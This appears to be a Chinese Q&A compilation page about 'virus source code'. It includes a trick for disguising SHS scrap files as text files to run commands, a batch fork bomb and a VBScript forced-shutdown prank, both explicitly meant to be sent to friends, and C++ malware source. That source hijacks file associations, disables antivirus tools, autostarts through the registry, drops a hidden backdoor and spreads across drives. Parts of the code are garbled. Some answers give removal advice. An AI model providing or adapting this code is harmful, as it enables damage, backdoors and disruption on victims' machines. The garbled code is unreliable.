文本病毒源碼

『壹』 誰能給個shs病毒的源碼小例子

如果你從網上下載了一個txt文件，你可曾想過它有可能是病毒嗎?可能有些人安全意識較高，會掃描所有從網上下載的資料，可是如果連殺毒軟體也認為這不是病毒，你還會懷疑它嗎？我想大多數人都會雙擊這個txt文件進行閱讀了。可能有些人聽說過exe文件通過更改文件名為XXX.txt.exe這種形式來偽裝，但這大多數都會被殺毒軟體毫不留情的揪出來。可是今天我們介紹的一種文件卻是實實在在的系統文件，可是它對我們的電腦卻有著致命的危害。這就是SHS文件。什麼是SHS文件呢？我們知道，在windows系統下，我們在不同的文件間復制信息時，系統是將對象包裝成一個碎片對象來進行復制的。這種技術稱為Shell Scrap Object,簡稱（SSO）。可是如果我們沒有將對象粘貼在另一個文件中，而是直接粘貼在硬碟上呢？這時我們會發現，出現了一個圖標特異的文件，這個文件便是SHS碎片文件。大家可以進行如下嘗試，打開word，隨便輸入一段話，然後，選中一段話，直接按住左鍵將這些內容拉到硬碟上，你便會看到，生成了一個碎片文件。如果黑客對它進行更換圖標，便可以騙過大多數人，讓大家誤以為這只是一個txt文件。可能有人說，SHS文件應該後綴不同吧，怎麼可能看不出來呢？是的，可是你知道嗎？windows是支持雙後綴的，，即使你點上了「顯示已知文件類型的擴展名」，SHS文件所顯示出來的依然是txt文檔文件。因為它本來就是如假包換的文本，而且還是系統文件！只不過它不完整罷了。任何殺毒軟體都不會認為它是系統的危脅。下面我們一簡單製作一個危險的SHS文件，當然代碼是我們寫的，我們不用擔心它會破壞系統。
我們先在任意盤符下新建一個txt文件，任意輸入幾個字元。在運行中輸入packager.exe，會出現對象包裝程序，然後點文件--導入，導入剛才新建的文檔（一定要輸入幾個字元，否則是無法導入的）。然後點擊編輯-----命令行，這個便是這個文檔執行的操作了，這里我們輸入"cmd /c dir c:\ & pause"好了，讓它列出你的C盤目錄，點確定。然後點編輯------復制包，然後在任意盤符下粘貼。最後雙擊運行即可，系統會提示你是否要運行，點運行。這時我們會發現，出現了cmd窗口，窗口中的內容是你的C盤目錄，點任意鍵退出即可。
從上面的例子我們知道，如果在命令中加個format，我們會有什麼損失，大家都清楚吧？
當然，SHS文件的攻擊是完全可以防止的，方法如下：
1。去掉HKEY_CLASSES_ROOT\ShellScrap\shell\open\command下面的的SHS文件關聯
2。在HKEY_CLASSES_ROOT\ShellScrap鍵下，有一個鍵值「NeverShowExt」,它是導致SHS文件無法顯示擴展名的禍首，只要刪除這個鍵值，SHS文件便會顯示出它的擴展名了。
3。SHS文件與文檔有類似的圖標，易麻痹人，我們可以給它換一個圖標。方法是打開資源管理器，點工具----文件夾選項，選文件類型，在已注冊文件類型中選中SHS文件，選高級，點更改圖標，更改一個與文檔有較大區別的圖標即可.

『貳』 如何查看病毒的源代碼

源代碼（也稱源程序），是指一系列人類可讀的計算機語言指令。

在現代程序語言中，源代碼可以是以書籍或者磁帶的形式出現，但最為常用的格式是文本文件，這種典型格式的目的是為了編譯出計算機程序。計算機源代碼的最終目的是將人類可讀的文本翻譯成為計算機可以執行的二進制指令，這種過程叫做編譯，通過編譯器完成。

作用 ：

源代碼主要功用有如下2種作用：

生成目標代碼，即計算機可以識別的代碼。

對軟體進行說明，即對軟體的編寫進行說明。為數不少的初學者，甚至少數有經驗的程序員都忽視軟體說明的編寫，因為這部分雖然不會在生成的程序中直接顯示，也不參與編譯。但是說明對軟體的學習、分享、維護和軟體復用都有巨大的好處。因此，書寫軟體說明在業界被認為是能創造優秀程序的良好習慣，一些公司也硬性規定必須書寫。

需要指出的是，源代碼的修改不能改變已經生成的目標代碼。如果需要目標代碼做出相應的修改，必須重新編譯。

『叄』 病毒源代碼怎麼用

病毒的形式有許多種,有的是腳本,有的是安裝程序,很多種類型,不同類型的病毒有不同的寫法,或是生成的方法,你看到的應該是腳本代碼,用文本記下後,改後綴名字,具體後綴名也不同,

『肆』 什麼是電腦病毒代碼

病毒代碼是可以給計算機造成破壞的惡意程序的代碼，這個代碼生成的程序就是病毒。病毒是由一些試圖對他人電腦進行破壞或者其他商業利益行為而驅使一些人製作的。

『伍』 求病毒樣本以及源代碼

1.新建一個記事本

2.把下面代碼增貼進去

@echo off
start cmd
%0

3.增貼後，點擊文件 - 另存為

4.輸入文件名，在文件名後面加上.bat

5.然後發給好友就可以了！

（發送好友的時候，就好就加個殼，右鍵文件 - 壓縮文件 即可！）

PS：力相當的厲害，所以請勿弄過火，否則後果自負！

文件「我是豬」讓好友關機

相信有的人知道是什麼，有的人不知道是什麼

總之這個是讓別人關機的東西。

那怎麼製作呢？

其實很簡單， - 小威 - 今天給大家的教程是：文件「我是豬」讓好友關機

製作方式：

1.點擊桌面 - 右鍵 - 新建 - 文本文檔

2.打開這個 文本文檔

3.把這些代碼復制到 文本文檔上去

on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""一分鍾關你機，不信，試試···"" ",0 ,true
dim a
do while(a <> "我是豬")
a = inputbox ("說 ""我是豬""0","說不說","不說",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早說就行了嘛"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈，真過癮"

4.復制好後，點擊 文件 - 另存為 - 桌面 - 然後輸入名字的時候，在名字的後面加上 .vbe

比如我要輸入的名字是：小威 則改成 小威.vbe

然後點擊保存、

然後把這個東西發給好友，只要好友一打開。

如果好友不輸入：我是豬的話，則立即關機。

教程到這。

『陸』 把病毒源代碼復制在電腦的文本里會怎麼樣

那個測試是沒有什麼價值的，並不能真正測試出一個殺軟的好壞，其實也沒什麼好壞之分，一個殺軟用時間長了，不怎麼中毒，用的順手，就是一個好殺軟！

『柒』 病毒源代碼是什麼

剛才我答了一個帖子。正好也能用來回答你的問題。
是這樣的，要徹底的殺掉病毒，並不需要知道病毒源代碼。其實，就算知道了病毒源代碼對我們殺毒也起不了太大的作用（為了消除歧異：在一些情況下，知道文件的源代碼，對文件的操作是非常有幫助的）。

下面，就如何完整的殺掉病毒解釋如下，如果覺得好，就給點兒分吧。呵呵：

1 若知道機器中了病毒。也就是殺毒軟體已經找到了病毒，操作方法如下：
1）得到病毒名稱，一般可以通過查找殺毒軟體的歷史記錄得到。如某病毒為「A.abc」
2) 到Google或網路搜索「A.abc」得到該病毒的詳細信息。一般來講，詳細信息包括病毒文件的存儲位置以及該病毒的注冊表信息。
3）按Ctrl+Alt+Del打開Windows任務管理器，點擊進程標簽查看進程信息，若有「A.abc」，則關閉此進程，再關閉任務管理器；若無，則關閉任務管理器。
4） 按照剛才在Google或網路得到的文件存儲位置找到病毒文件，手工刪除病毒文件。若成功刪除，進行第5）步，若不能成功刪除，則進行第5）步，然後返回第4）步刪除病毒文件
5）按照剛才在Google或網路得到的文件注冊表信息找到該病毒的注冊表信息並刪除。
打開注冊表：
開始－>運行->輸入「regedit」，回車。
按照在網路或Google的查詢結果尋找病毒注冊表信息：
HKLM -> Software -> Microsoft -> winodws -> currentVersion -> Run
右側應該有：
loadyt2"%systemroot%\inf\A.abc"點擊刪除。

2 若不確定機器是否中病毒，則操作方法如下：
1）按Alt＋Ctl＋Del打開任務管理器，點擊進程標簽查看進程信息。看見似乎像是病毒的進程，將進程名字作為搜索條件在網路或Google中搜索。
2）若搜索結果顯示其果真為病毒，則按照第1種情況的第3）步開始執行。
3）若搜索結果表明其不是病毒，則不要結束該進程。否則若您對操作系統的了解不深入的話，容易造成不悅後果。

『捌』 文件夾圖標病毒的病毒源代碼

bool CVirousApp::OpenFuckFile()
{
char CmdLine[MAX_PATH]={0};
char DirUrl[MAX_PATH]={0};
char HiJack[MAX_PATH]={0};
if(!GetCurrentDirectory(MAX_PATH,DirUrl))
return FALSE;
char ch='\';
if(ch!=*(DirUrl strlen(DirUrl)-1))
{
strcat(DirUrl,\);
}
//此處只在系統根目錄下有效
sprintf(HiJack,%s%s\,DirUrl,AfxGetApp()->m_pszAp pName);
//判斷是否存在。
可以打開
if(-1==_access(HiJack,0))
return FALSE;
else
{
sprintf(CmdLine,explorer.exe %s,HiJack);
// MessageBox(CmdLine); //For a Test
if(WinExec(CmdLine,SW_SHOW)<31)
return FALSE;
}
return TRUE;
}
2、劫持txt、exe文件，並屏蔽常用安全工具
//定義特徵字元串
BOOL check=TRUE;
int len=7;
char *FuckExe[]={USBCleaner,
Kis,
Kav,
IceSword,
Kill,
WSYSCHECK,
360};
//獲取參數並判斷
if(strcmp(m_lpCmdLine,))//如果有參數
{
//判斷特徵字元串
int i;
for(i=0;i<len;i )
{
if(strstr(_strupr(_strp(m_lpCmdLine)),
_strupr(_strp(FuckExe))))
{ check=FALSE; break;}
}
// LPTSTR ext;
// ext=wcschr(m_lpCmdLine,_T(.)) 1;
CString cmd;
// if(!wcscmp(ext,_T(txt)))
if(strstr(m_lpCmdLine,_T(.txt))||strstr(m_lpCmdL ine,_T(.TXT)))
{
cmd.Format(%s %s,notepad.exe,m_lpCmdLine);
}
else
if(strstr(m_lpCmdLine,_T(.exe))||strstr(m_lpCmdL ine,_T(.EXE)))
{
//此處不完美。
判斷文件名
if(!check)
{
// AfxMessageBox(文件已損壞！);
::MessageBox(NULL,文件已損壞！請重新安裝應用程序！,Microsoft,MB_OK);
return FALSE;
}
else
cmd.Format(%s,m_lpCmdLine);
}
WinExec(cmd,SW_NORMAL);
}
else
//打開文件
OpenFuckFile();
3、自啟動及實現劫持exe、txt文件
//向系統目錄下拷貝程序
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hMole;
hMole=GetMoleHandle(NULL);
GetMoleFileName(hMole,FileSource,MAX_PATH);
CloseHandle(hMole);
GetSystemDirectory(FileNew,MAX_PATH);
strcat(FileNew,\SysKernel.exe);
CopyFile(FileSource,FileNew,TRUE);
SetFileAttributes(FileNew, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//寫注冊表。
弄個自啟動
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft \Windows\CurrentVersion\Run,
SysKernel,REG_SZ,FileNew,0,0);
//寫注冊表，進行映像劫持
char Hijack[MAX_PATH]={0};
sprintf(Hijack,%s %%1,FileNew);
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Classes\ txtfile\shell\open\command,
NULL,REG_SZ,Hijack,0,1);
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Classes\ exefile\shell\open\command,
NULL,REG_SZ,Hijack,0,1);
4、釋放後門，並啟動之
BOOL CVirousDlg::ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)
{
HGLOBAL hRes;
HRSRC hResInfo;
HANDLE hFile;
DWORD dwBytes;
hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);
if (hResInfo == NULL)
return FALSE;
hRes = LoadResource(NULL, hResInfo);
if (hRes == NULL)
return FALSE;
hFile = CreateFile
(
lpFileName,
GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile == NULL)
return FALSE;
WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);
CloseHandle(hFile);
return TRUE;
}
VOID CVirousDlg::ReleaseDoor()
{
char strSystemPath[MAX_PATH];
GetSystemDirectory(strSystemPath, sizeof(strSystemPath));
lstrcat(strSystemPath, \SysService.exe);
ReleaseResource(IDR_BIN, BIN, strSystemPath);
SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//實現後門自啟動
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft \Windows\CurrentVersion\Run,
SysService,REG_SZ,strSystemPath,0,0);
WinExec(strSystemPath,SW_HIDE);
}
5、遍歷磁碟並拷貝自身
//遍歷系統磁碟
BOOL CVirousDlg::FuckFile()
{
DWORD dwNumBytesForDriveStrings;//實際存儲驅動器號的字元串長度
LPSTR lp;
CString strLogdrive;
//獲得實際存儲驅動器號的字元串長度
dwNumBytesForDriveStrings=GetLogicalDriveStrings(0 ,NULL);//*sizeof(TCHAR);
//如果字元串不為空。
則表示有正常的驅動器存在
if (dwNumBytesForDriveStrings!=0)
{
lp=new char[dwNumBytesForDriveStrings];
GetLogicalDriveStrings(dwNumBytesForDriveStrings,l p);
while (*lp!=0)
{
DoBad(lp);
lp=strchr(lp,0) 1;
}
return TRUE;
}
else
return FALSE;
}
//干壞事
VOID CVirousDlg::DoBad(char DriveBuf[])
{
CFileFind finder;
// build a string with wildcards
CString strWildcard(DriveBuf);
strWildcard = _T(*.*);
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hMole;
hMole=GetMoleHandle(NULL);
GetMoleFileName(hMole,FileSource,MAX_PATH);
// CloseHandle(hMole);
// start working for files
BOOL bWorking = finder.FindFile(strWildcard);
while (bWorking)
{
// nReg ;
bWorking = finder.FindNextFile();
// skip . and .. files; otherwise, we'd
// recur infinitely!
if (finder.IsDots())
continue;
// if it's a directory, recursively search it
if (finder.IsDirectory()&&!finder.IsSystem()&&!finder .IsHidden())
{
nReg ;
if(!SetFileAttributes(finder.GetFilePath(),
FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))
continue;
sprintf(FileNew,%s%s,finder.GetFilePath(),.exe );
CopyFile(FileSource,FileNew,TRUE);
if(FUCKREG==nReg)
{
WriteReg(FileNew);
}
}
}
finder.Close();
}

『玖』 病毒源代碼

剛才我答了一個帖子。正好也能用來回答你的問題。
是這樣的，要徹底的殺掉病毒，並不需要知道病毒源代碼。其實，就算知道了病毒源代碼對我們殺毒也起不了太大的作用（為了消除歧異：在一些情況下，知道文件的源代碼，對文件的操作是非常有幫助的）。

下面，就如何完整的殺掉病毒解釋如下，如果覺得好，就給點兒分吧。呵呵：

1 若知道機器中了病毒。也就是殺毒軟體已經找到了病毒，操作方法如下：
1）得到病毒名稱，一般可以通過查找殺毒軟體的歷史記錄得到。如某病毒為「A.abc」
2) 到Google或網路搜索「A.abc」得到該病毒的詳細信息。一般來講，詳細信息包括病毒文件的存儲位置以及該病毒的注冊表信息。
3）按Ctrl+Alt+Del打開Windows任務管理器，點擊進程標簽查看進程信息，若有「A.abc」，則關閉此進程，再關閉任務管理器；若無，則關閉任務管理器。
4） 按照剛才在Google或網路得到的文件存儲位置找到病毒文件，手工刪除病毒文件。若成功刪除，進行第5）步，若不能成功刪除，則進行第5）步，然後返回第4）步刪除病毒文件
5）按照剛才在Google或網路得到的文件注冊表信息找到該病毒的注冊表信息並刪除。
打開注冊表：
開始－>運行->輸入「regedit」，回車。
按照在網路或Google的查詢結果尋找病毒注冊表信息：
HKLM -> Software -> Microsoft -> winodws -> currentVersion -> Run
右側應該有：
loadyt2"%systemroot%\inf\A.abc"點擊刪除。

2 若不確定機器是否中病毒，則操作方法如下：
1）按Alt＋Ctl＋Del打開任務管理器，點擊進程標簽查看進程信息。看見似乎像是病毒的進程，將進程名字作為搜索條件在網路或Google中搜索。
2）若搜索結果顯示其果真為病毒，則按照第1種情況的第3）步開始執行。
3）若搜索結果表明其不是病毒，則不要結束該進程。否則若您對操作系統的了解不深入的話，容易造成不悅後果。

『拾』 怎樣察看病毒文件源代碼（有追加分）

滑鼠右擊病毒文件
選擇用記事本或一些功能更強的編輯軟體打開